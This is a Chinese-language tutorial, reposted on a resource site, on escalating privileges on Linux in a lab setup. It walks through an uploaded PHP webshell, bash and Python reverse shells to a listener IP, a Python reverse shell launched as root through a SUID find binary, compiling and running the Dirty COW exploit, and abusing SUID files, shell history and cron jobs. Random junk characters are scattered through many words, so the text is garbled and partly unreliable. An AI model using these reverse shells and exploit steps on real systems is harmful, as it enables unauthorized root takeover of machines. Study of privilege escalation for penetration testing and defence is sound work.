古风

Linux操作系统提权

作者:古风 本文共28张图片 4247个字,阅读需要11分钟 百度已收录

大致归纳总结如下:
Linux操作系统提权-古风游戏资源网
不过最核心也是最常见的提取方法还是内核提权,其他大多与程序员的配置有关,出现的几率不是很高。

0x01:Linux提权基础知识

  1. uname -a
  2. 查看内核版本
  3. id
  4. 显示用户的ID,以及所属群组的ID
  5. pwd
  6. 显示当前路径
  7. dp; - W N & 2 # Qkg -l
  8. rpm -qa
  9. 查看已经安装的程序
  10. cat /etc/issue
  11. cat /etc/*-release
  12. 查看发行版

密码权限

大部分Linux系统的密码都和/etc/passwd/etc/sh O 6 t ? kadow这两个配置文件有关,passwd里面储存5 { } [的是用户,shadow里面! V = a存储的是密码的hash值。出于安全考虑passwd是全用户可读,root可写的,而shadow是仅root可读写q 3 R t _ C p的。

/etc/passwd
Linux操作系统提权-古风游戏资源网
passwd由冒号分割c C B 3,第一列是用户名,第二列t * | ; G是密码,x代表密码hash被放在shadow里M S V J 9 t面.

/e+ , Z ptc/shadow
Linux操作系统提权-古风游戏资源网
shadow里面的就是密码的hash,但只有m O 7 Y ? 4root权限才可以查看。

密码复用

另外需要注意的是Y L K 6 6 u F ^ j很多管理员会重复使用密码,所以有可能数6 H 5据库或者web后台的密码就是rd a U ) v T eoot密码。

提权常见的流程

  1. wget http://exp/exp.c
  1. 下载exp文件
  1. gcc-o exp exp.c
  1. 利用gcc进行编译B F n D操作,编译成二进制文件
  1. chmod+x exp
  1. 将e~ k ! dxp更改为可执行权限
  1. ./exp
  1. 运行exph 3 Z ` d 8进行提权

0x02:Linux反弹shell

Linux一般拿到shell,权限基本都很低,而且在菜刀b ^ a P . Z $ 4或其他工具中执行命令没有交互过程(在菜刀等工具中,只是输入返回内容,如在菜刀中执行ssh等命令就f ; = 3 ? 6 D不可行),所以2 e [ /需要通过反弹shell拥有一个交互式的shell。

准备环境

  1. ubuntu + apache
  2. kail 192.16C # d ^ R C8.186.134
  3. u$ j 6 b ; tbuntu 192.168.186.13 h *52

上传进去一个php一句话木马,菜刀连接
Linux操作系统提权-古风游戏资源网
查看当前权限
Linux操作系统提权-古风游戏资源网
下面就使n s x e G o ?用反弹she* V 0 a D Gll的方法获取到交互式shell

第一种方法:

利用最经典也是最常用的方法进行反弹shell,另外反弹shell时设置的端口最好是常用端口,不常用的端口可能会被防火墙给拦截掉。

  1. 先进行本地进行监听:
  2. nc -lvp 53
  3. 然后在拿到she= 9 B /ll的机器上执行:
  4. bash -i >& /dev/tcp/192.16u u * {8.186.134/53 0>&aX J M M U 3 Y Y 9mp;1

但是执行失败了,没有权限

第二种方法:

利用python脚本进行反弹shell,要将脚本上传到服务器上就要找一个低权限用户可以上传且可以执行的目录,一般在tmp或者/var/tD h p W } m Xmp中就有这样的权限
Linux操作系统提权-古风游戏资源网
pyshell

  1. 使用方法:
  2. 本地监听 :nc -l -p 53 -vv
  3. 目标机器执行:python back.py 192.168.186.134 53

反弹成功,这样就形成了一个交互式的shell,方便下一步的进行

如果在使用python文件没有权限时,使用如下命令即可,因为该文件是当前用户上传进去的,拥有修改的权限。

  1. chmod 777 back.py

0x03:脏牛提权

DirtyCOW,CVE-2016-5195,攻击者可利用该漏洞本地以低权限提升到root权限。Dirty6 4 E x COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞X I { p V 3 W的特别之处在于,防病毒和安全软件无法检测,一旦被利用,根本无从知晓。

  1. 漏洞在全版本LiL @ mnux系统(Linux kernel >= 2.6.22)均可以实现提权
  2. 如果内: 7 - , -核版本低于列表里的版本,2 y m j / ~表示还存在脏牛漏洞
  3. Cento$ S @ is7 /RHEL7 3.10.0-327.36.3.el7
  4. Cetnos6/RHEL6P # ! 2.6.32-642.6.2.el6
  5. Ubuntu 16.10 4.8.0-26.2D X b8
  6. Ubuntu 16.( Q @04 4.4.0-45.66
  7. Ubu* ] E @ 5 `ntu 14.04 3.13.0-100.147
  8. Debian 8 3.16.36-1+deb8u2
  9. Debian 7 3.2.82-1

exp地N D o 6 U a

在反弹she# f w dll成功的基础上继续来做

先来看一下操作系统的版本,低于列表里的版本即存在脏牛漏洞

  1. uname -r

通过/etc/passwd了解到超级管理员c I Q是root
Linux操作系统提权-古风游戏资源网
查看下当前用户的id
Linux操作系统提权-古风游戏资源网
下载exp文件

  1. wget https://github.com/FireFart/dirtycow/blob/master/dirty.c

可以看exp中的说明来执行命令
Linux操作系统提权-古风游戏资源网
先通过gcc来编译dirty.c文件

  1. gcc -pthread dirty.c -o dirty -lcrypt

Linux操作系统提权-古风游戏资源网
编译好的dirty文件,替换root用户

  1. ./dirty

成功替换掉了原来的root用户,提权成功。
Linux操作系统提权-古风游戏资源网
脏牛提权除下这个exp,还有其他6 Z z ^ -的,例如:CVE-2016-5195,具体就不在演示了J B V A Z m,按照说明即可,注意文件名不对,自己改下就好。

Linux提权实战

0x00:Linux分析工具

LinuxF d O B f-exploit-suggester

Linux权限提升审核工具,是基于操作系统的Q O L ^ &内核版本号。程序会执行/ ! H #“uname -r”命令来获取Linux操作系统发行版本,之后返回一个包含了适用9 a L ? S $ 7 kexploits的提示列表。

L+ 8 P T @inux-exploit-suggester

  1. ./linz D Q B g f ux-exploit-suggester.sh

执行命令即可
Linux操作系统提权-古风游戏资源网
这样就将存在的漏洞呈现了出来,利用exp提权即可,非常方便.

Searchsploi & N g Jt

Searchsploit通过本地的exploit-db, 查找软件漏洞 ; J , Q x ;信息

使用方法:

  1. searchsploit

Linux操作系统提权-古风游戏资源网
如需查看Cent] A 6OS 7 内核版本为3.k 3 f 510的内核漏洞

  1. search1 5 H 2sploit centos 7 kernel 3.10

Linux操作系统提权-古风游戏资源网
知道该内核版本下存在哪些漏洞即可进行提权操作

0x02:SUID提权

什么是SUID

在Linux中,存在suid、guid、sticky,SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者5 w %权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。

如果想要为文件附d C 7 S | ! 5上这样的权限命令:

  1. chmod u+s
  2. chmod 4755

(有s标志位便是u Z U {拥有SUID权限)

具体的话大致理解就是通过拥有 { - V GSUID权限二进制文件或程序可以执行命令等,从而进行root提权操作
Linux操作系统提权-古风游戏资源网
查找符合条件的文件

  1. find / -user root -perm -4000 -print 2>/5 _ P 6 Bdev/null
  2. find / -perm -u=s -type f 2>/dev/null
  3. find / -user root -perm -4000 -exec ls -ldb {} \;

Linux操作系统提权-古风游戏资源网
上面的所有二进制文件都可以在root权限下运行,因为属主是root,且权限中含有s

下面就以find命令来实践一下,首先要给find设当SUId ^ a yD权限

  1. chmod u+s /usr/bin/find

Linux操作系统提权-古风游戏资源网
如果Find命令也是以SuB & G = _ v = 8id权限~ M B { * 4 I运行的话,则将通过find执行的所有命令都会以roo- J K = 8 t 5t权限执行。

当前用户为
Linux操作系统提权-古风游戏资源网
随便找一个文件主要是为了执行后面的命令

  1. /usr/bin/find pass.txt -exec whoami \;

Linux操作系统提权-古风游戏资源网
提权成b r q功,接下来以root用户的身份反弹sz W $ m 2 Ehell

  1. /usr/bin/find pass.txt -exec python -c 'import socket,subprocess,os;s=M { ) .socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.186.150",53));os.du? N ^ Kp2(s.fileno(),0);^ n h U Q w O F os.dup2(s.fif A J X r flenoi E Z H &(),1); os= z X b .dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;

Linux操作系统提权-古风游戏资源网
如果出现如下错误,关闭两边的防火墙即可
Linux操作系统提权-古风游戏资源网
反弹shell成功,当然还有其他命令可以进行提权,前提是要有SUID权限,这里就不再举例了。

0x03:历史记录提权

通过查看历史记录,查看是否有有用的信息,有的管理员为了方便登陆mysql或其他软件时,不经意间加上参数-p,从而将密/ Y g $ /码暴露出来或者一些.sh脚本5 7 b U c K I 7连接mysql、vpn等,查看对应的配置文件即可拿到账号密码

  1. cat ~/.bash_history
  2. 保存了当前用户使用过的历史命令

Linux操作系统提权-古风游戏资源网
如果拿到数据库的账号密码,有可能就是roox [ + { } % d Z 9t密码

0x04:计划任务提权! U T s q F i S &

系统内可能会有一些. M ]定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出

  1. ls -l /etc/cron*

Linux操作系统提权-古风游戏资源网
默认这些程序是以root权限执行,如果有任意用户可写的脚本,我们就可以修改脚本等回连rootshellZ d i 5 % [ l ^了。

0x05:配置错误引发提权

手动找如果对Linux系统不熟悉的话基本是找不到的,所以可以利用工具去查. - 4 -找 unix-privesc-check:http://pentestmonkey.net/tools/audit/unc r m ` K qix-privesc-check linuxprivchecker:https://www.se{ j a H e Zcuritysift.com/download/linuxprivchecker.py
Linux操作系统提权-古风游戏资源网
检查了非常多的配置问题,而且还列出了所有的Q i 3可写文件,如果找到有配置问题的便] Z 8 : T o可以进行提权操作。

总结k 6 j ; ^ W z

经过这次学习,简单的算是对Linuo O A 2 = K ! Ax提权有了一定的了解h r ~,但还有很多姿势需要` V Y 1 = U 1 C去学习,还是需要不断去积累。

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到审核区发布,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"www.qwznb.com",如遇到无法解压的请联系管理员!
古风游戏资源网 » Linux操作系统提权

Leave a Reply


赞助 VIP 海量资源随便下
仅开放社交账号登录